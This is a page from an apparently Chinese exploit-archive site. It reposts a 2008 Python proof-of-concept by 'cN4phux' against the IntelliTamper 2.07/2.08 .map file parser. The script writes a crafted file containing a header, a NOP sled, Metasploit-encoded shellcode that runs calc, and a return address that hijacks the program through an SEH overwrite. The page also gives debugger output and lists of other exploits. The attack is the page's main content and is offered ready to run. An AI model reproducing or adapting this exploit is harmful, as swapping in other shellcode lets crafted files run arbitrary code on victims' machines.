首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit
来源:cN4phux@gmail.com 作者:cN4phux 发布时间:2008-12-29  
#!/usr/bin/python
# IntelliTamper 2.07/2.08  (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <cN4phux@gmail.com>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :


import sys
map_theader = ((("\x23\x23\x23\x20\x53\x49\x54\x45\x4D"
                 "\x41\x50\x31\x20\x49\x4E\x54\x45\x4C"
                 "\x4C\x49\x54\x41\x4D\x50\x45\x52\x0D\x0A"))) #junk

map_iheader = "\x46\x49\x4C\x45\x23\x23"

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ((("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
               "\x91\xc1\x60\x83\xeb\xfc\xe2\xf4\x39\x79\x85\x60\xc5\x91\x4a\x25"
               "\xf9\x1a\xbd\x65\xbd\x90\x2e\xeb\x8a\x89\x4a\x3f\xe5\x90\x2a\x29"
               "\x4e\xa5\x4a\x61\x2b\xa0\x01\xf9\x69\x15\x01\x14\xc2\x50\x0b\x6d"
               "\xc4\x53\x2a\x94\xfe\xc5\xe5\x64\xb0\x74\x4a\x3f\xe1\x90\x2a\x06"
               "\x4e\x9d\x8a\xeb\x9a\x8d\xc0\x8b\x4e\x8d\x4a\x61\x2e\x18\x9d\x44"
               "\xc1\x52\xf0\xa0\xa1\x1a\x81\x50\x40\x51\xb9\x6c\x4e\xd1\xcd\xeb"
               "\xb5\x8d\x6c\xeb\xad\x99\x2a\x69\x4e\x11\x71\x60\xc5\x91\x4a\x08"
               "\xf9\xce\xf0\x96\xa5\xc7\x48\x98\x46\x51\xba\x30\xad\x61\x4b\x64"
               "\x9a\xf9\x59\x9e\x4f\x9f\x96\x9f\x22\xf2\xa0\x0c\xa6\x91\xc1\x60"))); # 160 byte

header_nop = "\x90"*327

retn = "\x7b\x34\x12\x00"+".html\n" # EIP value with 4 byte fix

exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("0x.map", "w")
headers.write(exploit)
headers.close()

print "\nFile created successfully !";
print "\n\cN4phux.";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer XM
·Firefox, Internet Explorer, Op
·Amaya Web Browser <= 11.0.1 Re
·Exploits joomla com_lowcosthot
·MS Windows Media Player * (.WA
·PSI remote integer overflow Do
·Joomla Component com_liveticke
·FreeBSD 7/6x protosw kernel ex
·Joomla Component com_ice 0.5b2
·SAWStudio 3.9i (prf File) Loca
·BulletProof FTP Client (.bps F
·Acoustica Mixcraft <= 4.2 Univ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved